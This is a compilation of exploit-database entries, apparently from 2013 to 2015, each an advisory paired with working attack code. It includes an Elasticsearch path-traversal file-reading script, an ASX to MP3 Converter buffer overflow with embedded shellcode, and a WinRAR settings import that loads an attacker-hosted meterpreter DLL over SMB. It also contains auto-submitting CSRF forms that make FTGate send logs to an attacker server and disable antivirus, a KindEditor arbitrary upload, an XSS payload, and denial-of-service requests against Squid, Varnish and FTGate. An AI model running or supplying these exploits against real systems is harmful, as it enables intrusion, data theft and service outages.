Avast will render the commonName of X.509 certificates into an HTMLLayout frame when your MITM proxy detects a bad signature. Unbelievably, this means CN="<h1>really?!?!?</h1>" actually works, and is pretty simple to convert into remote code execution.
To verify this bug, I've attached a demo certificate for you. Please find attached key.pem, cert.pem and cert.der. Run this command to serve it from a machine with openssl:
$ sudo openssl s_server -key key.pem -cert cert.pem -accept 443
Then visit that https server from a machine with Avast installed. Click the message that appears to demonstrate launching calc.exe.
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/38384.zip
source: https://www.securityfocus.com/bid/58431/info
KindEditor is prone to multiple remote file-upload vulnerabilities because it fails to sufficiently sanitize user-supplied input.
Attackers can exploit these issues to upload arbitrary code and run it in the context of the web server process. This may facilitate unauthorized access or privilege escalation; other attacks are also possible.
KindEditor 4.1.5 is vulnerable; other versions may also be affected.
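<?php
// Demonstrates the unrestricted upload: upload_json.php accepts a non-image
// (.txt) file through the 'imgFile' field when dir=file is requested.
$uploadfile = "KedAns.txt";
$target = "http://www.example.com/kindeditor/php/upload_json.php?dir=file";

// The "@path" form of CURLOPT_POSTFIELDS was deprecated in PHP 5.5 and
// removed in 7.0; use CURLFile where the runtime provides it.
$file = class_exists('CURLFile') ? new CURLFile($uploadfile) : "@$uploadfile";

$ch = curl_init($target);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, array('imgFile' => $file));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
if ($postResult === false) {
    // Report transport failures instead of silently printing an empty string.
    fwrite(STDERR, "curl error: " . curl_error($ch) . "\n");
}
curl_close($ch);
print "$postResult";
?>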
# KindEditor (ASP,ASP.NET,JSP,PHP) _JSON Uploader :
--------------------------------------------------
<html><head>
<!-- Stand-alone uploader built on KindEditor's own client library: it posts an
     arbitrary file as the 'imgFile' field to the server-side upload handler.
     Point 'url' at the variant the target actually ships (upload_json.php /
     .asp / .jsp / ASP.NET); the PHP PoC above uses upload_json.php while this
     page mixes the php/ directory with the .asp handler -- adjust to the
     target's layout. -->
<title>Uploader By KedAns-Dz</title>
<script src="http://www.example.com/kindeditor/kindeditor-min.js"></script>
<script>
KindEditor.ready(function(K) {
var uploadbutton = K.uploadbutton({
button : K('#uploadButton')[0],
fieldName : 'imgFile',
url : 'http://www.example.com/kindeditor/php/upload_json.asp?dir=file',
afterUpload : function(data) {
// error === 0 is the server's success indicator; data.url is where the
// uploaded file landed, shown in the read-only text box.
if (data.error === 0) {
var url = K.formatUrl(data.url, 'absolute');
K('#url').val(url);}
},
});
// Submit as soon as a file is picked.
uploadbutton.fileBox.change(function(e) {
uploadbutton.submit();
});
});
</script></head><body>
<div class="upload">
<input class="ke-input-text" type="text" id="url" value="" readonly="readonly" />
<input type="button" id="uploadButton" value="Upload" />
</div>
</body>
</html>
# elasticpwn Script for ElasticSearch url path traversal vuln. CVE-2015-5531
```
[crg@fogheaven elasticpwn]$ python CVE-2015-5531.py exploitlab.int /etc/hosts
!dSR script for CVE-2015-5531
127.0.0.1 localhost
# The following lines are desirable for IPv6 capable hosts
::1 ip6-localhost ip6-loopback
fe00::0 ip6-localnet
ff00::0 ip6-mcastprefix
ff02::1 ip6-allnodes
ff02::2 ip6-allrouters
ff02::3 ip6-allhosts
The script requires path.repo to be set in elasticsearch.yml and the directory to be writable by the elasticsearch process.
To bypass the snapshot- prefix that the server side adds, we first create a known relative path:
curl http://exploitlab.int:9200/_snapshot/?pretty
{
"pwn" : {
"type" : "fs",
"settings" : {
"location" : "dsr"
}
},
"pwnie" : {
"type" : "fs",
"settings" : {
"location" : "dsr/snapshot-ev1l"
}
}
}
We will use it later to access through path traversal url:
trav = 'ev1l%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..'
The file content is returned as an array of ints embedded in the error message, which needs to be translated into human-readable text:
crg@exploitlab:~$ python elk-5531.py localhost /etc/issue
!dSR script for CVE-2015-5531
{u'status': 400, u'error': u'ElasticsearchParseException[Failed to derive xcontent from (offset=0, length=26): [85, 98, 117, 110, 116, 117, 32, 49, 50, 46, 48, 52, 46, 53, 32, 76, 84, 83, 32, 92, 110, 32, 92, 108, 10, 10]]'}
[85, 98, 117, 110, 116, 117, 32, 49, 50, 46, 48, 52, 46, 53, 32, 76, 84, 83, 32, 92, 110, 32, 92, 108, 10, 10] = Ubuntu 12.04.5 LTS \n \l
There is also a path disclosure that could help exploiting in some scenarios:
crg@exploitlab:~$ python elk-5531.py localhost /etc/passwda
!dSR script for CVE-2015-5531
{"error":"SnapshotMissingException[[pwn:dsr/../../../../../../../../etc/passwda] is missing]; nested: FileNotFoundException[/var/tmp/dsr/snapshot-dsr/../../../../../../../../etc/passwda (No such file or directory)]; ","status":404}
```
#!/usr/bin/env python
# PoC for CVE-2015-5531 - Reported by Benjamin Smith
# Affects ElasticSearch 1.6.0 and prior
# Pedro Andujar || twitter: pandujar || email: @segfault.es || @digitalsec.net
# Jose A. Guasch || twitter: @SecByDefault || jaguasch at gmail.com
# Tested on default Linux (.deb) install || requires path.repo: to be set on config file
import urllib, urllib2, json, sys, re
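print "!dSR script for CVE-2015-5531\n"

# A usage error must not exit 0; the original did, which hides the failure
# from anything scripting this tool.
if len(sys.argv) != 3:
    print "Ex: %s www.example.com /etc/passwd" % sys.argv[0]
    sys.exit(1)

host = sys.argv[1]
# Percent-encode everything including '/', presumably so the path is not
# normalised away before the repository code decodes it.
fpath = urllib.quote(sys.argv[2], safe='')
port = 9600 if False else 9200  # default Elasticsearch HTTP port

# 'ev1l' cancels the "snapshot-" prefix via the 'pwnie' repository located at
# dsr/snapshot-ev1l (see the write-up above); the %2f-encoded '..' then climb
# out of the repository root.
trav = 'ev1l%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..'
reponame = 'pwn'
baseurl = "http://%s:%s/_snapshot/" % (host, port)
xplurl = '%s%s/%s%s' % (baseurl, reponame, trav, fpath)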
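def createSnapdirs():
    """Register two filesystem snapshot repositories on the target.

    'pwn' points at location "dsr" and 'pwnie' at "dsr/snapshot-ev1l"; the second
    registration is what makes the snapshot-ev1l directory exist, so that the
    traversal prefix in `trav` has somewhere to start from. Both registrations
    persist on the target after this script exits (presumably removable with a
    DELETE to the same URLs -- not done here), which matters for cleanup.

    Exits with status 1, printing the server's error text, when a registration is
    rejected (typically because path.repo is unset in elasticsearch.yml), when the
    error body is not JSON, or when the server cannot be reached at all -- the
    latter two previously surfaced as raw tracebacks.
    """
    repos = (
        (reponame, '{"type":"fs","settings":{"location":"dsr"}}'),
        (reponame + 'ie', '{"type":"fs","settings":{"location":"dsr/snapshot-ev1l"}}'),
    )
    for name, body in repos:
        # baseurl already ends in '/', so this yields '/_snapshot//pwn' exactly as
        # the original did; the server accepted it in the author's run.
        url = "%s/%s" % (baseurl, name)
        request = urllib2.Request(url, data=body)
        # urllib2 already POSTs when data is supplied; kept explicit as published.
        request.get_method = lambda: 'POST'
        try:
            urllib2.urlopen(request)
        except urllib2.HTTPError as e:
            print("[!] ERROR: Verify path.repo exist in config file, elasticsearch.yml:\n")
            try:
                print(str(json.load(e)['error']))
            except (ValueError, KeyError, TypeError):
                print("HTTP %d from %s (no JSON 'error' field in body)" % (e.code, url))
            sys.exit(1)
        except urllib2.URLError as e:
            # Connection-level failure (refused, DNS, timeout): no HTTP body to parse.
            print("[!] ERROR: could not reach %s: %s" % (url, e.reason))
            sys.exit(1)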
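def grabFile(xplurl):
    """Fetch one file through the traversal URL and print its contents.

    The server tries to parse the target file as a snapshot descriptor, fails, and
    in the resulting 400 error message echoes the raw file bytes as a bracketed
    list of integers (see the sample run above). That list is decoded here.

    Any other error -- e.g. the 404 SnapshotMissingException for a missing file,
    whose text leaks the repository's filesystem path -- is printed verbatim. The
    previous 'skip the first two numbers, treat the rest as bytes' approach turned
    such messages into garbage, because digits in the leaked path were decoded
    as byte values.

    Args:
        xplurl: full _snapshot URL including the traversal prefix and encoded path.
    """
    try:
        urllib2.urlopen(xplurl)
    except urllib2.HTTPError as e:
        try:
            err = str(json.load(e)['error'])
        except (ValueError, KeyError, TypeError):
            print("[!] HTTP %d with no JSON 'error' field in body" % e.code)
            return
        # The byte list is the only bracketed run of comma-separated integers in
        # the message; the '(offset=0, length=N)' pair before it is not bracketed
        # on its own and so is not matched. An empty file ("[]") falls through to
        # the verbatim print below.
        match = re.search(r'\[(\d+(?:,\s*\d+)*)\]', err)
        if match is None:
            print(err)
            return
        content = bytearray(int(b) for b in match.group(1).split(','))
        print(content)
        return
    # A 2xx reply means the name resolved to a real snapshot descriptor: there is
    # no embedded file content to decode, so say so instead of printing nothing.
    print("[!] Unexpected success response from %s (nothing to decode)" % xplurl)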
def main():
    # Order matters: the repositories (and the snapshot-ev1l directory) must exist
    # before the traversal URL is requested.
    createSnapdirs()
    grabFile(xplurl)
if __name__ == "__main__":
    main()
'''
# Exploit Title: ASX to MP3 Converter 1.82.50 Stack Overflow
# Date: 2 Oct 2015
# Exploit Author: ex_ptr
# Vendor Homepage: http://mini-stream.net
# Version: 1.82.50
# Tested on: Windows XP SP3
'''
import struct
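# Build a malicious .asx playlist for ASX to MP3 Converter 1.82.50 (the author
# tested on Windows XP SP3; the return address below presumably comes from that
# environment and is not expected to work elsewhere).
filename = "exploit.asx"
# Layout: 0x104 bytes of filler reach the saved return address, which is then
# overwritten with 0x76af3adc; four 0xFF bytes and a 4-byte NOP sled precede the
# 144-byte payload. Every piece is a bytes literal so the concatenation is valid
# on both Python 2 (where b"" is just "") and Python 3 (where str + bytes raises
# TypeError), and the result is what gets written to disk in binary mode.
dummy = b"A" * 0x104
EIP = struct.pack('<I', 0x76af3adc)  # little-endian, as it sits on the x86 stack
FFFF = b"\xFF\xFF\xFF\xFF"
NOP = b"\x90" * 4
Shell = (b"\x31\xc9\xbd\x90\xb7\x29\xb8\xd9\xf7\xd9\x74\x24\xf4\xb1\x1e"
         b"\x58\x31\x68\x11\x03\x68\x11\x83\xe8\x6c\x55\xdc\x44\x64\xde"
         b"\x1f\xb5\x74\x54\x5a\x89\xff\x16\x60\x89\xfe\x09\xe1\x26\x18"
         b"\x5d\xa9\x98\x19\x8a\x1f\x52\x2d\xc7\xa1\x8a\x7c\x17\x38\xfe"
         b"\xfa\x57\x4f\xf8\xc3\x92\xbd\x07\x01\xc9\x4a\x3c\xd1\x2a\xb7"
         b"\x36\x3c\xb9\xe8\x9c\xbf\x55\x70\x56\xb3\xe2\xf6\x37\xd7\xf5"
         b"\xe3\x43\xfb\x7e\xf2\xb8\x8a\xdd\xd1\x3a\x4f\x82\x28\xb5\x2f"
         b"\x6b\x2f\xb2\xe9\xa3\x24\x84\xf9\x48\x4a\x19\xac\xc4\xc3\x29"
         b"\x27\x22\x90\xea\x5d\x83\xff\x94\x79\xc1\x73\x01\xe1\xf8\xfe"
         b"\xdf\x46\xfa\x18\xbc\x09\x68\x84\x43")
exploit = dummy + EIP + FFFF + NOP + Shell
# 'with' guarantees the handle is closed even if the write fails part-way.
with open(filename, 'wb') as f:
    f.write(exploit)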
#!/usr/bin/python -w
# Title : WinRar Settings Import Command Execution
# Date : 02/10/2015
# Author : R-73eN
# Tested on : Windows 7 Ultimate
# Vulnerable Versions : Winrar < 5.30 beta 4
# The vulnerability exists in the "Import Settings From File" function.
# WinRAR stores its settings as a registry export (.reg) file and, on import,
# applies that file to the registry without checking that it only touches the
# keys WinRAR itself uses. A specially crafted settings file can therefore
# overwrite arbitrary registry keys.
# Since we have access to registry there are various ways we could use this to
# get code execution such as defining "RUN" keys or creating new services etc
# However the best way to get code execution is using AppInit DLLs
# AppInit DLLs are DLLs that are loaded into any process when it starts.
# In this case, we can specify a meterpreter DLL payload using a UNC path on
# an SMB server we control and then next time a new process starts we will
# get a shell.
# Read more about AppInit Dlls : https://support.microsoft.com/en-us/kb/197571
#
# Triggering the vulnerability
# 1) Run this python script.
# 2) Open WinRar
# 3) Click Options
# 4) Click Import/Export
# 5) Import Settings from file
# 6) Select the Specially crafted Settings.reg file
#
# Disclosure Timeline:
# 01/10/2015 - Vendor Contacted POC provided
# 02/10/2015 - Vendor released a patch in WinRAR 5.30 beta 4 that verifies the
# imported file only contains [HKEY_CURRENT_USER\Software\WinRAR] or a
# [HKEY_CURRENT_USER\Software\WinRAR\...] subkey before applying it
#
#
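# Console banner ("InfoGen AL" ASCII art). Backslashes that form the art are
# written as '\\' rather than relying on Python keeping unknown escapes such as
# '\ ' or '\_' intact (a behaviour that only warns today); the text is unchanged.
banner = (" ___ __ ____ _ _ \n"
          " |_ _|_ __ / _| ___ / ___| ___ _ __ / \\ | | \n"
          " | || '_ \\| |_ / _ \\| | _ / _ \\ '_ \\ / _ \\ | | \n"
          " | || | | | _| (_) | |_| | __/ | | | / ___ \\| |___ \n"
          " |___|_| |_|_| \\___/ \\____|\\___|_| |_| /_/ \\_\\_____|\n\n")
# print(...) with a single argument behaves identically on Python 2 and 3.
print(banner)
print("[+] WinRar Settings Import Command Execution [+]\n")
# UNC path of the attacker-hosted DLL (e.g. \\server\share\payload.dll). Each
# single backslash is doubled because .reg string values use backslash escaping.
dll = raw_input("[+] Enter dll location (smb) : ")
dll = dll.replace("\\", "\\\\")
print("[+] Writing Contet To Settings.reg [+]")
# Registry export that, once imported by WinRAR, switches AppInit_DLLs on and
# points it at the attacker DLL. The key path is spelled with explicit '\\'
# instead of '\S', '\M', '\W', '\C' unknown escapes; the emitted bytes are the
# same as the original script produced.
# NOTE(review): the key lives under HKEY_LOCAL_MACHINE, so the import presumably
# only succeeds from an elevated WinRAR -- confirm on the target.
evil = ('Windows Registry Editor Version 5.00\n\n'
        '[HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Windows]\n'
        '"AppInit_DLLs"="' + dll + '"\n'
        '"LoadAppInit_DLLs"=dword:00000001\n')
print(evil)
# 'with' closes the file even if the write fails.
with open("Settings.reg", "w") as f:
    f.write(evil)
print("[+] Settings.reg created successfully [+]")
print("\n https://www.infogen.al/ \n")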
[+] Credits: hyp3rlinx
[+] Website: hyp3rlinx.altervista.org
[+] Source:
http://hyp3rlinx.altervista.org/advisories/AS-FTGATE-V7-CSRF.txt
Vendor:
================================
www.ftgate.com
www.ftgate.com/ftgate-update-7-0-300
Product:
================================
FTGate v7
Vulnerability Type:
=================================
Cross site request forgery (CSRF)
CVE Reference:
==============
N/A
Vulnerability Details:
=====================
Multiple CSRF vectors exist within FTGate v7 (web-admin interface on port 8089). Because the state-changing requests carry no anti-CSRF token, an attacker who lures a logged-in administrator to a page under their control can:
www.ftgate.com/ftgate-update-7-0-300
1) add arbitrary domains
2) enable remote archiving of logs to an attacker-chosen server
3) whitelist arbitrary email addresses
4) add an arbitrary mailbox and disable antivirus scanning,
5) remove attachment blocking for executable file types.
Exploit code(s) (each form below is a separate PoC page: they all reuse id='HELL', and doit() submits only the first element with that id, so host one form per HTML file):
===============
<!DOCTYPE>
<html>
<body onLoad="doit()">
<script>
// Runs from the body onLoad handler: auto-submits the form with id 'HELL'
// (only the first element with that id is found, so use one form per page).
function doit() {
  document.getElementById('HELL').submit();
}
</script>
1) add arbitrary remote domain:
<form id='HELL' action="
http://localhost:8089/v7/wizards/adddomain.fts?action=save&id="
method="post">
<input type="text" name="name" value="abysmalgodz" />
<input type="text" name="type" value="1" />
</form>
2) enable arbitrary remote archive:
<form id='HELL' action="
http://localhost:8089/v7/webadmin/config/archive.fts?action=save"
method="post">
<input type="text" name="action" value="save" />
<input type="text" name="enable" value="on" />
<input type="text" name="duration" value="0" />
<input type="text" name="external" value="on" />
<input type="text" name="extarcserver" value="0.6.6.6" />
</form>
3) disable antivirus scanning for .exe attachments. The same endpoint also has a
persistent XSS injection point, but the stored payload is truncated to 5
characters, so it cannot carry a working script; it does, however, break the
well-formedness of the XML the database returns to the web UI.
e.g.
HTTP response after attack outputs corrupted XML generating errors.
<cell>exe</cell>
<cell/>
<cell><scri</cell>
<cell/>
</row>
<row id='id_"/><s'>
http://localhost:8089/v7/axml/adminlists.fts?table=ext&add=exe
<form id='HELL' action="
http://localhost:8089/v7/webadmin/filters/virus.fts?action=save&mailbox="
method="post">
<input type="text" name="mode" value="on" />
<input type="text" name="selftest" value="0ff" />
<input type="text" name="extGrid_id_exe_0" value="1" />
</form>
add arbitrary Admins:
http://localhost:8089/v7/axml/adminlists.fts?table=admin&add=ghostofsin
whitelist arbitrary email addresses:
Messages that originate from these email addresses are not filtered by the
Word or Phrase filters.
http://localhost:8089/v7/axml/whitelist.fts?id=531&add=hell@abyss.666
<!--remove email attachment blocking for exe, hta & html filez -->
http://localhost:8089/v7/axml/attachments.fts?id=531&remove=7,10,3
Requesting the above URL returns XML listing every file extension blocked on
incoming email together with each entry's database ID, so the IDs to remove are known;
so to remove blocking of .cmd we select '11'
http://localhost:8089/v7/axml/attachments.fts?id=531&remove=11
or remove blocking of multiple file types in one shot
http://localhost:8089/v7/axml/attachments.fts?id=531&remove=7,10,3
add arbitrary mailbox:
<form id='HELL' action="
http://localhost:8089/v7/wizards/addmailbox.fts?action=save&id=500"
method="post">
<input type="text" name="name" value="punksnotdead" />
<input type="text" name="type" value="0" />
<input type="text" name="cn" value="punksnotdead" />
<input type="text" name="password" value="punksnotdead" />
</form>
</body>
</html>
Disclosure Timeline:
========================================
Vendor Notification: September 29, 2015
October 1, 2015 : Public Disclosure
Exploitation Technique:
=======================
Remote
Severity Level:
================
High
Description:
==========================================================
Request Method(s): [+] GET and POST (the form-based vectors above submit via POST; the axml endpoints are plain GET links)
Vulnerable Product: [+] FTGate v7
Vulnerable Parameter(s): [+] type, id, mode, add, extarcserver
===========================================================
[+] Disclaimer
Permission is hereby granted for the redistribution of this advisory,
provided that it is not altered except by reformatting it, and that due
credit is given. Permission is explicitly given for insertion in
vulnerability databases and similar, provided that due credit is given to
the author.
The author is not responsible for any misuse of the information contained
herein and prohibits any malicious use of all security related information
or exploits by the author or elsewhere.
by hyp3rlinx
[+] Credits: hyp3rlinx
[+] Website: hyp3rlinx.altervista.org
[+] Source:
http://hyp3rlinx.altervista.org/advisories/AS-FTGATE-2009-CSRF.txt
Vendor:
================================
www.ftgate.com
Product:
========================================
FTGate 2009 SR3 May 13 2010 Build 6.4.00
Vulnerability Type:
=================================
Cross site request forgery (CSRF)
CVE Reference:
==============
N/A
Vulnerability Details:
=====================
Multiple CSRF vectors exist within FTGate 2009 that allow us to add
arbitrary remote domains,
disable antivirus scanning for various Email file attachment types, and
finally change settings
to have archived server logs sent to our remote attacker controlled server
for safe keeping.
Exploit code(s):
===============
CSRF(s) (each form below is a separate PoC page: they all reuse id="PUNKSNOTDEAD", and invertedcross() submits only the first element with that id, so host one form per HTML file):
<!DOCTYPE>
<html>
<body onLoad="invertedcross()">
<script>
// Runs from the body onLoad handler: auto-submits the form with id 'PUNKSNOTDEAD'
// (only the first element with that id is found, so use one form per page).
function invertedcross() {
  document.getElementById('PUNKSNOTDEAD').submit();
}
</script>
1) add arbitrary domains:
-------------------------
<form id="PUNKSNOTDEAD" action="
http://localhost:8089/webadmin/mailboxes/index.fts?action=save"
method="post">
<input type="text" name="dname" value="hyp3rlinx.com" />
<input type="text" name="dtype" value="4" />
<input type="text" name="fname" value="*" />
<input type="text" name="action" value="domadd" />
<input type="text" name="domain" value="" />
<input type="text" name="newdomain" value="" />
</form>
2) sends archived logs to arbitrary remote server:
--------------------------------------------------
<form id="PUNKSNOTDEAD" action="
http://localhost:8089/webadmin/config/archive.fts?action=save"
method="post">
<input type="text" name="enable" value="on" />
<input type="text" name="path"
value="C%3A%5CProgram+Files+%28x86%29%5CFTGate+2009%5CArchive" />
<input type="text" name="duration" value="0" />
<input type="text" name="external" value="on" />
<input type="text" name="extarcserver" value="6.6.6.0" />
</form>
3) disable virus scan for .jar or .exe files etc:
-------------------------------------------------
Options to control handling of virus scanning for email attachments Virus
Scanning Mode
Operating mode of the virus scanner mode=0 to Disable Virus Scanning.
<form id="PUNKSNOTDEAD" action="
http://localhost:8089/webadmin/filters/virus.fts" method="post">
<input type="text" name="action" value="add" />
<input type="text" name="mode" value="0" />
<input type="text" name="extension" value="dll" />
</form>
</body>
</html>
Disclosure Timeline:
=========================================================
Vendor Notification: September 29, 2015
October 1, 2015 : Public Disclosure
Exploitation Technique:
=======================
Remote
Severity Level:
=========================================================
High
Description:
==========================================================
Request Method(s): [+] POST
Vulnerable Product: [+] FTGate 2009 SR3 May 13 2010 Build
6.4.00
Vulnerable Parameter(s): [+] domadd, extarcserver & mode
####################################################
[+] Credits: hyp3rlinx
[+] Website: hyp3rlinx.altervista.org
[+] Source:
http://hyp3rlinx.altervista.org/advisories/AS-FTGATE-2009-DOS.txt
Vendor:
================================
www.ftgate.com
Product:
================================
FTGate 2009 SR3 May 13 2010 Build 6.4.000
Vulnerability Type:
=======================
Denial of service (DOS)
CVE Reference:
==============
N/A
Vulnerability Details:
=====================
Multiple denial-of-service opportunities exist within FTGate 2009 that allow an
attacker to disrupt and shut down various FTGate services via GET requests to the
web-admin interface (port 8089) issued from the victim's browser -- i.e. by luring
a user who presumably holds an active admin session to an attacker-controlled page or link.
Exploit code(s):
===============
DOS:
1) shutdown solight web mail interface on port 80
http://127.0.0.1:8089/webadmin/services/index.fts?action=stop_service&id=36
2) shutdown Monitor server port 8081
http://127.0.0.1:8089/webadmin/services/index.fts?action=stop_service&id=35
3) shutdown FTGate connector server port 8090 listens on address 'Any'
http://127.0.0.1:8089/webadmin/services/index.fts?action=stop_service&id=38
4) shutdown IMAP server port 143 listening on 'Any'
http://127.0.0.1:8089/webadmin/services/index.fts?action=stop_service&id=33
Disclosure Timeline:
=========================================================
Vendor Notification: September 29, 2015
October 1, 2015 : Public Disclosure
Exploitation Technique:
=======================
Remote
Severity Level:
=========================================================
Medium
Description:
==========================================================
Request Method(s): [+] GET
Vulnerable Product: [+] FTGate 2009 SR3 May 13 2010 Build
6.4.000
Vulnerable Parameter(s): [+] action, id
===========================================================
[+] Disclaimer
Permission is hereby granted for the redistribution of this advisory,
provided that it is not altered except by reformatting it, and that due
credit is given. Permission is explicitly given for insertion in
vulnerability databases and similar, provided that due credit is given to
the author.
The author is not responsible for any misuse of the information contained
herein and prohibits any malicious use of all security related information
or exploits by the author or elsewhere.
by hyp3rlinx
source: https://www.securityfocus.com/bid/58425/info
Privoxy is prone to multiple information-disclosure vulnerabilities.
Attackers can exploit these issues to gain access to user accounts and potentially obtain sensitive information, which may aid in further attacks. The capture below shows what this looks like: a remote web server (here a Metasploit capture/http listener, per the Server header) answers with 407 and a `Proxy-Authenticate: Basic` challenge; because Privoxy relays that challenge unchanged, the browser treats it as coming from the proxy and may prompt the user for proxy credentials, which are then sent to the remote server.
Privoxy 3.0.20 is affected; other versions may also be vulnerable.
Response Code (current).: 407
Response Headers (as seen by your browser).:
HTTP/1.1 407 Proxy Authentication Required
Date: Mon, 11 Mar 2013 17:01:59 GMT
Server: ./msfcli auxiliary/server/capture/http set SRVPORT=80
Proxy-Authenticate: Basic
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 571
Keep-Alive: timeout=15, max=99
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Request Headers (as seen by the remote website)
Host: c22.cc
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:19.0) Gecko/20100101 Firefox/19.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://www.example.com/
Connection: keep-alive
source: https://www.securityfocus.com/bid/58421/info
The podPress plugin for WordPress is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied input.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
podPress 8.8.10.13 is vulnerable; other versions may also be affected.
http://www.example.com/wp-content/plugins/podpress/players/1pixelout/1pixelout_player.swf?playerID=\"))}catch(e){alert(/xss/)}//
source: https://www.securityfocus.com/bid/58334/info
Verax NMS is prone to multiple security-bypass and information disclosure vulnerabilities.
Attackers can exploit these issues to bypass certain security restrictions, perform unauthorized actions, and obtain sensitive information; this may aid in launching further attacks.
Versions prior to Verax NMS 2.1.0 are vulnerable.
#!/usr/bin/python
#just based on http://www.example.com/tutorials/general/client.html#basic-example
from pyamf import AMF0, AMF3
from pyamf.remoting.client import RemotingService
# Flex remoting endpoint of the target installation ('installationurl' is a
# placeholder for the real host); AMF3 is negotiated explicitly.
endpoint = 'http://installationurl/enetworkmanagementsystem-fds/messagebroker/amf'
client = RemotingService(endpoint, amf_version=AMF3)
# No credentials are supplied anywhere in this script: the userService
# destination apparently answers getAllUsers() without authentication.
service = client.getService('userService')
print(service.getAllUsers())
source: https://www.securityfocus.com/bid/58319/info
Squid is prone to a remote denial-of-service vulnerability.
Attackers can exploit this issue to crash the application, resulting in denial-of-service conditions.
Squid 3.2.5 is vulnerable; other versions may also be affected.
Request
-- cut --
#!/usr/bin/env python
# Emit the raw request one line per print, so the separators are bare LF and the
# final line contributes "\r\n\r\n" followed by print's own "\n".
# The X-HEADSHOT value is 19000 copies of the malformed percent-escape '%XX'
# (57000 bytes), which is what triggers the crash in Squid 3.2.5.
request_lines = [
    'GET /index.html HTTP/1.1',
    'Host: localhost',
    'X-HEADSHOT: ' + '%XX' * 19000,
    '\r\n\r\n',
]
for line in request_lines:
    print(line)
-- cut --
Response
-- cut --
HTTP/1.1 200 OK
Vary: X-HEADSHOT
-- cut --
source: https://www.securityfocus.com/bid/58314/info
Varnish Cache is prone to multiple denial-of-service vulnerabilities.
An attacker can exploit these issues to crash the application, effectively denying service to legitimate users.
Varnish Cache 2.1.5 is vulnerable; other versions may also be affected.
The following example backend responses trigger the issue -- Content-Length values that do not fit (99999999999999999) or only just fit (2147483647, the signed 32-bit maximum) in a 32-bit integer:
HTTP/1.1 200 OK
Content-Type: text/xml; charset=utf-8
Content-Length: 99999999999999999
HTTP/1.1 200 OK
Content-Length: 2147483647